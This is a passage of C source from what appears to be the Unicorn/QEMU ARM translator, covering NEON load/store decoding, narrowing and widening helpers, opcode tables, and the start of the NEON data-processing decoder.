                            neon_store_reg(tcg_ctx, rd, pass, tmp2);
                        } else {
                            tmp2 = neon_load_reg(tcg_ctx, rd, pass);
                            for (n = 0; n < 4; n++) {
                                tmp = tcg_temp_new_i32(tcg_ctx);
                                if (n == 0) {
                                    tcg_gen_mov_i32(tcg_ctx, tmp, tmp2);
                                } else {
                                    tcg_gen_shri_i32(tcg_ctx, tmp, tmp2, n * 8);
                                }
                                gen_aa32_st8(s, tmp, addr, get_mem_index(s));
                                tcg_temp_free_i32(tcg_ctx, tmp);
                                tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                            }
                            tcg_temp_free_i32(tcg_ctx, tmp2);
                        }
                    }
                }
            }
            rd += spacing;
        }
        tcg_temp_free_i32(tcg_ctx, addr);
        stride = nregs * 8;
    } else {
        size = (insn >> 10) & 3;
        if (size == 3) {
            /* Load single element to all lanes.  */
            int a = (insn >> 4) & 1;
            if (!load) {
                return 1;
            }
            size = (insn >> 6) & 3;
            nregs = ((insn >> 8) & 3) + 1;

            if (size == 3) {
                if (nregs != 4 || a == 0) {
                    return 1;
                }
                /* For VLD4 size==3 a == 1 means 32 bits at 16 byte alignment */
                size = 2;
            }
            if (nregs == 1 && a == 1 && size == 0) {
                return 1;
            }
            if (nregs == 3 && a == 1) {
                return 1;
            }
            addr = tcg_temp_new_i32(tcg_ctx);
            load_reg_var(s, addr, rn);
            if (nregs == 1) {
                /* VLD1 to all lanes: bit 5 indicates how many Dregs to write */
                tmp = gen_load_and_replicate(s, addr, size);
                tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 0));
                tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 1));
                if (insn & (1 << 5)) {
                    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd + 1, 0));
                    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd + 1, 1));
                }
                tcg_temp_free_i32(tcg_ctx, tmp);
            } else {
                /* VLD2/3/4 to all lanes: bit 5 indicates register stride */
                stride = (insn & (1 << 5)) ? 2 : 1;
                for (reg = 0; reg < nregs; reg++) {
                    tmp = gen_load_and_replicate(s, addr, size);
                    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 0));
                    tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 1));
                    tcg_temp_free_i32(tcg_ctx, tmp);
                    tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size);
                    rd += stride;
                }
            }
            tcg_temp_free_i32(tcg_ctx, addr);
            stride = (1 << size) * nregs;
        } else {
            /* Single element.  */
            int idx = (insn >> 4) & 0xf;
            pass = (insn >> 7) & 1;
            switch (size) {
            case 0:
                shift = ((insn >> 5) & 3) * 8;
                stride = 1;
                break;
            case 1:
                shift = ((insn >> 6) & 1) * 16;
                stride = (insn & (1 << 5)) ? 2 : 1;
                break;
            case 2:
                shift = 0;
                stride = (insn & (1 << 6)) ? 2 : 1;
                break;
            default:
                abort();
            }
            nregs = ((insn >> 8) & 3) + 1;
            /* Catch the UNDEF cases. This is unavoidably a bit messy. */
            switch (nregs) {
            case 1:
                if (((idx & (1 << size)) != 0) ||
                    (size == 2 && ((idx & 3) == 1 || (idx & 3) == 2))) {
                    return 1;
                }
                break;
            case 3:
                if ((idx & 1) != 0) {
                    return 1;
                }
                /* fall through */
            case 2:
                if (size == 2 && (idx & 2) != 0) {
                    return 1;
                }
                break;
            case 4:
                if ((size == 2) && ((idx & 3) == 3)) {
                    return 1;
                }
                break;
            default:
                abort();
            }
            if ((rd + stride * (nregs - 1)) > 31) {
                /* Attempts to write off the end of the register file
                 * are UNPREDICTABLE; we choose to UNDEF because otherwise
                 * the neon_load_reg() would write off the end of the array.
                 */
                return 1;
            }
            addr = tcg_temp_new_i32(tcg_ctx);
            load_reg_var(s, addr, rn);
            for (reg = 0; reg < nregs; reg++) {
                if (load) {
                    tmp = tcg_temp_new_i32(tcg_ctx);
                    switch (size) {
                    case 0:
                        gen_aa32_ld8u(s, tmp, addr, get_mem_index(s));
                        break;
                    case 1:
                        gen_aa32_ld16u(s, tmp, addr, get_mem_index(s));
                        break;
                    case 2:
                        gen_aa32_ld32u(s, tmp, addr, get_mem_index(s));
                        break;
                    default: /* Avoid compiler warnings.  */
                        abort();
                    }
                    if (size != 2) {
                        /* Merge the loaded element into the target lane.  */
                        tmp2 = neon_load_reg(tcg_ctx, rd, pass);
                        tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp,
                                            shift, size ? 16 : 8);
                        tcg_temp_free_i32(tcg_ctx, tmp2);
                    }
                    neon_store_reg(tcg_ctx, rd, pass, tmp);
                } else { /* Store */
                    tmp = neon_load_reg(tcg_ctx, rd, pass);
                    if (shift)
                        tcg_gen_shri_i32(tcg_ctx, tmp, tmp, shift);
                    switch (size) {
                    case 0:
                        gen_aa32_st8(s, tmp, addr, get_mem_index(s));
                        break;
                    case 1:
                        gen_aa32_st16(s, tmp, addr, get_mem_index(s));
                        break;
                    case 2:
                        gen_aa32_st32(s, tmp, addr, get_mem_index(s));
                        break;
                    }
                    tcg_temp_free_i32(tcg_ctx, tmp);
                }
                rd += stride;
                tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size);
            }
            tcg_temp_free_i32(tcg_ctx, addr);
            stride = nregs * (1 << size);
        }
    }
    /* Base register writeback: rm == 15 means none, rm == 13 means
     * post-increment by the transfer size, otherwise add register rm.
     */
    if (rm != 15) {
        TCGv_i32 base;

        base = load_reg(s, rn);
        if (rm == 13) {
            tcg_gen_addi_i32(tcg_ctx, base, base, stride);
        } else {
            TCGv_i32 index;
            index = load_reg(s, rm);
            tcg_gen_add_i32(tcg_ctx, base, base, index);
            tcg_temp_free_i32(tcg_ctx, index);
        }
        store_reg(s, rn, base);
    }
    return 0;
}

/* Bitwise select.  dest = c ? t : f.  Clobbers T and F.
*/
static void gen_neon_bsl(DisasContext *s, TCGv_i32 dest, TCGv_i32 t, TCGv_i32 f, TCGv_i32 c)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    tcg_gen_and_i32(tcg_ctx, t, t, c);
    tcg_gen_andc_i32(tcg_ctx, f, f, c);
    tcg_gen_or_i32(tcg_ctx, dest, t, f);
}

/* Narrow a 64-bit vector of elements to 32 bits (plain truncation).  */
static inline void gen_neon_narrow(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_narrow_u8(tcg_ctx, dest, src); break;
    case 1: gen_helper_neon_narrow_u16(tcg_ctx, dest, src); break;
    case 2: tcg_gen_trunc_i64_i32(tcg_ctx, dest, src); break;
    default: abort();
    }
}

/* Signed saturating narrow (sets QC in FPSCR via cpu_env on saturation).  */
static inline void gen_neon_narrow_sats(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_narrow_sat_s8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    case 1: gen_helper_neon_narrow_sat_s16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    case 2: gen_helper_neon_narrow_sat_s32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    default: abort();
    }
}

/* Unsigned saturating narrow.  */
static inline void gen_neon_narrow_satu(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_narrow_sat_u8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    case 1: gen_helper_neon_narrow_sat_u16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    case 2: gen_helper_neon_narrow_sat_u32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    default: abort();
    }
}

/* Signed-to-unsigned saturating narrow (VQMOVUN).  */
static inline void gen_neon_unarrow_sats(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_unarrow_sat8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    case 1: gen_helper_neon_unarrow_sat16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    case 2: gen_helper_neon_unarrow_sat32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break;
    default: abort();
    }
}

/* Narrowing shift: q selects rounding, u selects unsigned helpers.
 * Only 16- and 32-bit element sizes are valid here.
 */
static inline void gen_neon_shift_narrow(DisasContext *s, int size, TCGv_i32 var, TCGv_i32 shift,
                                         int q, int u)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    if (q) {
        if (u) {
            switch (size) {
            case 1: gen_helper_neon_rshl_u16(tcg_ctx, var, var, shift); break;
            case 2: gen_helper_neon_rshl_u32(tcg_ctx, var, var, shift); break;
            default: abort();
            }
        } else {
            switch (size) {
            case 1: gen_helper_neon_rshl_s16(tcg_ctx, var, var, shift); break;
            case 2: gen_helper_neon_rshl_s32(tcg_ctx, var, var, shift); break;
            default: abort();
            }
        }
    } else {
        if (u) {
            switch (size) {
            case 1: gen_helper_neon_shl_u16(tcg_ctx, var, var, shift); break;
            case 2: gen_helper_neon_shl_u32(tcg_ctx, var, var, shift); break;
            default: abort();
            }
        } else {
            switch (size) {
            case 1: gen_helper_neon_shl_s16(tcg_ctx, var, var, shift); break;
            case 2: gen_helper_neon_shl_s32(tcg_ctx, var, var, shift); break;
            default: abort();
            }
        }
    }
}

/* Widen 32-bit packed elements to 64 bits; u selects zero- vs sign-extend.
 * Frees (kills) src.
 */
static inline void gen_neon_widen(DisasContext *s, TCGv_i64 dest, TCGv_i32 src, int size, int u)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    if (u) {
        switch (size) {
        case 0: gen_helper_neon_widen_u8(tcg_ctx, dest, src); break;
        case 1: gen_helper_neon_widen_u16(tcg_ctx, dest, src); break;
        case 2: tcg_gen_extu_i32_i64(tcg_ctx, dest, src); break;
        default: abort();
        }
    } else {
        switch (size) {
        case 0: gen_helper_neon_widen_s8(tcg_ctx, dest, src); break;
        case 1: gen_helper_neon_widen_s16(tcg_ctx, dest, src); break;
        case 2: tcg_gen_ext_i32_i64(tcg_ctx, dest, src); break;
        default: abort();
        }
    }
    tcg_temp_free_i32(tcg_ctx, src);
}

/* Long (widened) add on the cpu_V0/cpu_V1 implicit operands.  */
static inline void gen_neon_addl(DisasContext *s, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_addl_u16(tcg_ctx, CPU_V001); break;
    case 1: gen_helper_neon_addl_u32(tcg_ctx, CPU_V001); break;
    case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break;
    default: abort();
    }
}

/* Long (widened) subtract on the cpu_V0/cpu_V1 implicit operands.  */
static inline void gen_neon_subl(DisasContext *s, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_subl_u16(tcg_ctx, CPU_V001); break;
    case 1: gen_helper_neon_subl_u32(tcg_ctx, CPU_V001); break;
    case 2: tcg_gen_sub_i64(tcg_ctx, CPU_V001); break;
    default: abort();
    }
}

/* Negate the widened elements in 'var' in place.  */
static inline void gen_neon_negl(DisasContext *s, TCGv_i64 var, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_negl_u16(tcg_ctx, var, var); break;
    case 1: gen_helper_neon_negl_u32(tcg_ctx, var, var); break;
    case 2:
        tcg_gen_neg_i64(tcg_ctx, var, var);
        break;
    default: abort();
    }
}

/* Saturating long add op0 += op1; note size here is 1 (s32) or 2 (s64).  */
static inline void gen_neon_addl_saturate(DisasContext *s, TCGv_i64 op0, TCGv_i64 op1, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 1: gen_helper_neon_addl_saturate_s32(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break;
    case 2: gen_helper_neon_addl_saturate_s64(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break;
    default: abort();
    }
}

/* Widening multiply dest = a * b; (size << 1) | u selects the element
 * size and signedness.  For 32-bit elements a plain 64-bit multiply is used.
 */
static inline void gen_neon_mull(DisasContext *s, TCGv_i64 dest, TCGv_i32 a, TCGv_i32 b,
                                 int size, int u)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i64 tmp;

    switch ((size << 1) | u) {
    case 0: gen_helper_neon_mull_s8(tcg_ctx, dest, a, b); break;
    case 1: gen_helper_neon_mull_u8(tcg_ctx, dest, a, b); break;
    case 2: gen_helper_neon_mull_s16(tcg_ctx, dest, a, b); break;
    case 3: gen_helper_neon_mull_u16(tcg_ctx, dest, a, b); break;
    case 4:
        tmp = gen_muls_i64_i32(s, a, b);
        tcg_gen_mov_i64(tcg_ctx, dest, tmp);
        tcg_temp_free_i64(tcg_ctx, tmp);
        break;
    case 5:
        tmp = gen_mulu_i64_i32(s, a, b);
        tcg_gen_mov_i64(tcg_ctx, dest, tmp);
        tcg_temp_free_i64(tcg_ctx, tmp);
        break;
    default: abort();
    }

    /* gen_helper_neon_mull_[su]{8|16} do not free their parameters.
       Don't forget to clean them now.
*/
    if (size < 2) {
        tcg_temp_free_i32(tcg_ctx, a);
        tcg_temp_free_i32(tcg_ctx, b);
    }
}

/* Dispatch the VMOVN/VQMOVN/VQMOVUN narrowing family:
 * op selects the VQMOVUN-style encoding, u selects unsigned saturation.
 */
static void gen_neon_narrow_op(DisasContext *s, int op, int u, int size,
                               TCGv_i32 dest, TCGv_i64 src)
{
    if (op) {
        if (u) {
            gen_neon_unarrow_sats(s, size, dest, src);
        } else {
            gen_neon_narrow(s, size, dest, src);
        }
    } else {
        if (u) {
            gen_neon_narrow_satu(s, size, dest, src);
        } else {
            gen_neon_narrow_sats(s, size, dest, src);
        }
    }
}

/* Symbolic constants for op fields for Neon 3-register same-length.
 * The values correspond to bits [11:8,4]; see the ARM ARM DDI0406B
 * table A7-9.
 */
#define NEON_3R_VHADD 0
#define NEON_3R_VQADD 1
#define NEON_3R_VRHADD 2
#define NEON_3R_LOGIC 3 /* VAND,VBIC,VORR,VMOV,VORN,VEOR,VBIF,VBIT,VBSL */
#define NEON_3R_VHSUB 4
#define NEON_3R_VQSUB 5
#define NEON_3R_VCGT 6
#define NEON_3R_VCGE 7
#define NEON_3R_VSHL 8
#define NEON_3R_VQSHL 9
#define NEON_3R_VRSHL 10
#define NEON_3R_VQRSHL 11
#define NEON_3R_VMAX 12
#define NEON_3R_VMIN 13
#define NEON_3R_VABD 14
#define NEON_3R_VABA 15
#define NEON_3R_VADD_VSUB 16
#define NEON_3R_VTST_VCEQ 17
#define NEON_3R_VML 18 /* VMLA, VMLAL, VMLS, VMLSL */
#define NEON_3R_VMUL 19
#define NEON_3R_VPMAX 20
#define NEON_3R_VPMIN 21
#define NEON_3R_VQDMULH_VQRDMULH 22
#define NEON_3R_VPADD 23
#define NEON_3R_SHA 24 /* SHA1C,SHA1P,SHA1M,SHA1SU0,SHA256H{2},SHA256SU1 */
#define NEON_3R_VFM 25 /* VFMA, VFMS : float fused multiply-add */
#define NEON_3R_FLOAT_ARITH 26 /* float VADD, VSUB, VPADD, VABD */
#define NEON_3R_FLOAT_MULTIPLY 27 /* float VMLA, VMLS, VMUL */
#define NEON_3R_FLOAT_CMP 28 /* float VCEQ, VCGE, VCGT */
#define NEON_3R_FLOAT_ACMP 29 /* float VACGE, VACGT, VACLE, VACLT */
#define NEON_3R_FLOAT_MINMAX 30 /* float VMIN, VMAX */
#define NEON_3R_FLOAT_MISC 31 /* float VRECPS, VRSQRTS, VMAXNM/MINNM */

/* Bit n set => element size n is allowed for that 3-reg op (else UNDEF).  */
static const uint8_t neon_3r_sizes[] = {
    /*NEON_3R_VHADD*/ 0x7,
    /*NEON_3R_VQADD*/ 0xf,
    /*NEON_3R_VRHADD*/ 0x7,
    /*NEON_3R_LOGIC*/ 0xf, /* size field encodes op type */
    /*NEON_3R_VHSUB*/ 0x7,
    /*NEON_3R_VQSUB*/ 0xf,
    /*NEON_3R_VCGT*/ 0x7,
    /*NEON_3R_VCGE*/ 0x7,
    /*NEON_3R_VSHL*/ 0xf,
    /*NEON_3R_VQSHL*/ 0xf,
    /*NEON_3R_VRSHL*/ 0xf,
    /*NEON_3R_VQRSHL*/ 0xf,
    /*NEON_3R_VMAX*/ 0x7,
    /*NEON_3R_VMIN*/ 0x7,
    /*NEON_3R_VABD*/ 0x7,
    /*NEON_3R_VABA*/ 0x7,
    /*NEON_3R_VADD_VSUB*/ 0xf,
    /*NEON_3R_VTST_VCEQ*/ 0x7,
    /*NEON_3R_VML*/ 0x7,
    /*NEON_3R_VMUL*/ 0x7,
    /*NEON_3R_VPMAX*/ 0x7,
    /*NEON_3R_VPMIN*/ 0x7,
    /*NEON_3R_VQDMULH_VQRDMULH*/ 0x6,
    /*NEON_3R_VPADD*/ 0x7,
    /*NEON_3R_SHA*/ 0xf, /* size field encodes op type */
    /*NEON_3R_VFM*/ 0x5, /* size bit 1 encodes op */
    /*NEON_3R_FLOAT_ARITH*/ 0x5, /* size bit 1 encodes op */
    /*NEON_3R_FLOAT_MULTIPLY*/ 0x5, /* size bit 1 encodes op */
    /*NEON_3R_FLOAT_CMP*/ 0x5, /* size bit 1 encodes op */
    /*NEON_3R_FLOAT_ACMP*/ 0x5, /* size bit 1 encodes op */
    /*NEON_3R_FLOAT_MINMAX*/ 0x5, /* size bit 1 encodes op */
    /*NEON_3R_FLOAT_MISC*/ 0x5, /* size bit 1 encodes op */
};

/* Symbolic constants for op fields for Neon 2-register miscellaneous.
 * The values correspond to bits [17:16,10:7]; see the ARM ARM DDI0406B
 * table A7-13.
 */
#define NEON_2RM_VREV64 0
#define NEON_2RM_VREV32 1
#define NEON_2RM_VREV16 2
#define NEON_2RM_VPADDL 4
#define NEON_2RM_VPADDL_U 5
#define NEON_2RM_AESE 6 /* Includes AESD */
#define NEON_2RM_AESMC 7 /* Includes AESIMC */
#define NEON_2RM_VCLS 8
#define NEON_2RM_VCLZ 9
#define NEON_2RM_VCNT 10
#define NEON_2RM_VMVN 11
#define NEON_2RM_VPADAL 12
#define NEON_2RM_VPADAL_U 13
#define NEON_2RM_VQABS 14
#define NEON_2RM_VQNEG 15
#define NEON_2RM_VCGT0 16
#define NEON_2RM_VCGE0 17
#define NEON_2RM_VCEQ0 18
#define NEON_2RM_VCLE0 19
#define NEON_2RM_VCLT0 20
#define NEON_2RM_SHA1H 21
#define NEON_2RM_VABS 22
#define NEON_2RM_VNEG 23
#define NEON_2RM_VCGT0_F 24
#define NEON_2RM_VCGE0_F 25
#define NEON_2RM_VCEQ0_F 26
#define NEON_2RM_VCLE0_F 27
#define NEON_2RM_VCLT0_F 28
#define NEON_2RM_VABS_F 30
#define NEON_2RM_VNEG_F 31
#define NEON_2RM_VSWP 32
#define NEON_2RM_VTRN 33
#define NEON_2RM_VUZP 34
#define NEON_2RM_VZIP 35
#define NEON_2RM_VMOVN 36 /* Includes VQMOVN, VQMOVUN */
#define NEON_2RM_VQMOVN 37 /* Includes VQMOVUN */
#define NEON_2RM_VSHLL 38
#define NEON_2RM_SHA1SU1 39 /* Includes SHA256SU0 */
#define NEON_2RM_VRINTN 40
#define NEON_2RM_VRINTX 41
#define NEON_2RM_VRINTA 42
#define NEON_2RM_VRINTZ 43
#define NEON_2RM_VCVT_F16_F32 44
#define NEON_2RM_VRINTM 45
#define NEON_2RM_VCVT_F32_F16 46
#define NEON_2RM_VRINTP 47
#define NEON_2RM_VCVTAU 48
#define NEON_2RM_VCVTAS 49
#define NEON_2RM_VCVTNU 50
#define NEON_2RM_VCVTNS 51
#define NEON_2RM_VCVTPU 52
#define NEON_2RM_VCVTPS 53
#define NEON_2RM_VCVTMU 54
#define NEON_2RM_VCVTMS 55
#define NEON_2RM_VRECPE 56
#define NEON_2RM_VRSQRTE 57
#define NEON_2RM_VRECPE_F 58
#define NEON_2RM_VRSQRTE_F 59
#define NEON_2RM_VCVT_FS 60
#define NEON_2RM_VCVT_FU 61
#define NEON_2RM_VCVT_SF 62
#define NEON_2RM_VCVT_UF 63

static int neon_2rm_is_float_op(int op)
{
    /* Return true if this neon 2reg-misc op is float-to-float */
    return (op == NEON_2RM_VABS_F || op == NEON_2RM_VNEG_F ||
            (op >= NEON_2RM_VRINTN && op <= NEON_2RM_VRINTZ) ||
            op == NEON_2RM_VRINTM ||
            (op >= NEON_2RM_VRINTP && op <= NEON_2RM_VCVTMS) ||
            op >= NEON_2RM_VRECPE_F);
}

/* Each entry in this array has bit n set if the insn allows
 * size value n (otherwise it will UNDEF). Since unallocated
 * op values will have no bits set they always UNDEF.
 */
static const uint8_t neon_2rm_sizes[] = {
    /*NEON_2RM_VREV64*/ 0x7,
    /*NEON_2RM_VREV32*/ 0x3,
    /*NEON_2RM_VREV16*/ 0x1,
    0,
    /*NEON_2RM_VPADDL*/ 0x7,
    /*NEON_2RM_VPADDL_U*/ 0x7,
    /*NEON_2RM_AESE*/ 0x1,
    /*NEON_2RM_AESMC*/ 0x1,
    /*NEON_2RM_VCLS*/ 0x7,
    /*NEON_2RM_VCLZ*/ 0x7,
    /*NEON_2RM_VCNT*/ 0x1,
    /*NEON_2RM_VMVN*/ 0x1,
    /*NEON_2RM_VPADAL*/ 0x7,
    /*NEON_2RM_VPADAL_U*/ 0x7,
    /*NEON_2RM_VQABS*/ 0x7,
    /*NEON_2RM_VQNEG*/ 0x7,
    /*NEON_2RM_VCGT0*/ 0x7,
    /*NEON_2RM_VCGE0*/ 0x7,
    /*NEON_2RM_VCEQ0*/ 0x7,
    /*NEON_2RM_VCLE0*/ 0x7,
    /*NEON_2RM_VCLT0*/ 0x7,
    /*NEON_2RM_SHA1H*/ 0x4,
    /*NEON_2RM_VABS*/ 0x7,
    /*NEON_2RM_VNEG*/ 0x7,
    /*NEON_2RM_VCGT0_F*/ 0x4,
    /*NEON_2RM_VCGE0_F*/ 0x4,
    /*NEON_2RM_VCEQ0_F*/ 0x4,
    /*NEON_2RM_VCLE0_F*/ 0x4,
    /*NEON_2RM_VCLT0_F*/ 0x4,
    0,
    /*NEON_2RM_VABS_F*/ 0x4,
    /*NEON_2RM_VNEG_F*/ 0x4,
    /*NEON_2RM_VSWP*/ 0x1,
    /*NEON_2RM_VTRN*/ 0x7,
    /*NEON_2RM_VUZP*/ 0x7,
    /*NEON_2RM_VZIP*/ 0x7,
    /*NEON_2RM_VMOVN*/ 0x7,
    /*NEON_2RM_VQMOVN*/ 0x7,
    /*NEON_2RM_VSHLL*/ 0x7,
    /*NEON_2RM_SHA1SU1*/ 0x4,
    /*NEON_2RM_VRINTN*/ 0x4,
    /*NEON_2RM_VRINTX*/ 0x4,
    /*NEON_2RM_VRINTA*/ 0x4,
    /*NEON_2RM_VRINTZ*/ 0x4,
    /*NEON_2RM_VCVT_F16_F32*/ 0x2,
    /*NEON_2RM_VRINTM*/ 0x4,
    /*NEON_2RM_VCVT_F32_F16*/ 0x2,
    /*NEON_2RM_VRINTP*/ 0x4,
    /*NEON_2RM_VCVTAU*/ 0x4,
    /*NEON_2RM_VCVTAS*/ 0x4,
    /*NEON_2RM_VCVTNU*/ 0x4,
    /*NEON_2RM_VCVTNS*/ 0x4,
    /*NEON_2RM_VCVTPU*/ 0x4,
    /*NEON_2RM_VCVTPS*/ 0x4,
    /*NEON_2RM_VCVTMU*/ 0x4,
    /*NEON_2RM_VCVTMS*/ 0x4,
    /*NEON_2RM_VRECPE*/ 0x4,
    /*NEON_2RM_VRSQRTE*/ 0x4,
    /*NEON_2RM_VRECPE_F*/ 0x4,
    /*NEON_2RM_VRSQRTE_F*/ 0x4,
/*NEON_2RM_VCVT_FS*/ 0x4, + /*NEON_2RM_VCVT_FU*/ 0x4, + /*NEON_2RM_VCVT_SF*/ 0x4, + /*NEON_2RM_VCVT_UF*/ 0x4, +}; + +/* Translate a NEON data processing instruction. Return nonzero if the + instruction is invalid. + We process data in a mixture of 32-bit and 64-bit chunks. + Mostly we use 32-bit chunks so we can use normal scalar instructions. */ + +static int disas_neon_data_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + int q; + int rd, rn, rm; + int size; + int shift; + int pass; + int count; + int pairwise; + int u; + uint32_t imm, mask; + TCGv_i32 tmp, tmp2, tmp3, tmp4, tmp5; + TCGv_i64 tmp64; + + /* FIXME: this access check should not take precedence over UNDEF + * for invalid encodings; we will generate incorrect syndrome information + * for attempts to execute invalid vfp/neon encodings with FP disabled. + */ + if (!s->cpacr_fpen) { + gen_exception_insn(s, 4, EXCP_UDEF, + syn_fp_access_trap(1, 0xe, s->thumb)); + return 0; + } + + if (!s->vfp_enabled) + return 1; + q = (insn & (1 << 6)) != 0; + u = (insn >> 24) & 1; + VFP_DREG_D(rd, insn); + VFP_DREG_N(rn, insn); + VFP_DREG_M(rm, insn); + size = (insn >> 20) & 3; + if ((insn & (1 << 23)) == 0) { + /* Three register same length. */ + op = ((insn >> 7) & 0x1e) | ((insn >> 4) & 1); + /* Catch invalid op and bad size combinations: UNDEF */ + if ((neon_3r_sizes[op] & (1 << size)) == 0) { + return 1; + } + /* All insns of this form UNDEF for either this condition or the + * superset of cases "Q==1"; we catch the latter later. + */ + if (q && ((rd | rn | rm) & 1)) { + return 1; + } + /* + * The SHA-1/SHA-256 3-register instructions require special treatment + * here, as their size field is overloaded as an op type selector, and + * they all consume their input in a single pass. 
+ */ + if (op == NEON_3R_SHA) { + if (!q) { + return 1; + } + if (!u) { /* SHA-1 */ + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rn); + tmp3 = tcg_const_i32(tcg_ctx, rm); + tmp4 = tcg_const_i32(tcg_ctx, size); + gen_helper_crypto_sha1_3reg(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3, tmp4); + tcg_temp_free_i32(tcg_ctx, tmp4); + } else { /* SHA-256 */ + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA256) || size == 3) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rn); + tmp3 = tcg_const_i32(tcg_ctx, rm); + switch (size) { + case 0: + gen_helper_crypto_sha256h(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + break; + case 1: + gen_helper_crypto_sha256h2(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + break; + case 2: + gen_helper_crypto_sha256su1(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + break; + } + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + return 0; + } + if (size == 3 && op != NEON_3R_LOGIC) { + /* 64-bit element instructions. */ + for (pass = 0; pass < (q ? 
2 : 1); pass++) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); + switch (op) { + case NEON_3R_VQADD: + if (u) { + gen_helper_neon_qadd_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else { + gen_helper_neon_qadd_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + break; + case NEON_3R_VQSUB: + if (u) { + gen_helper_neon_qsub_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else { + gen_helper_neon_qsub_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + break; + case NEON_3R_VSHL: + if (u) { + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_shl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VQSHL: + if (u) { + gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VRSHL: + if (u) { + gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VQRSHL: + if (u) { + gen_helper_neon_qrshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_qrshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + 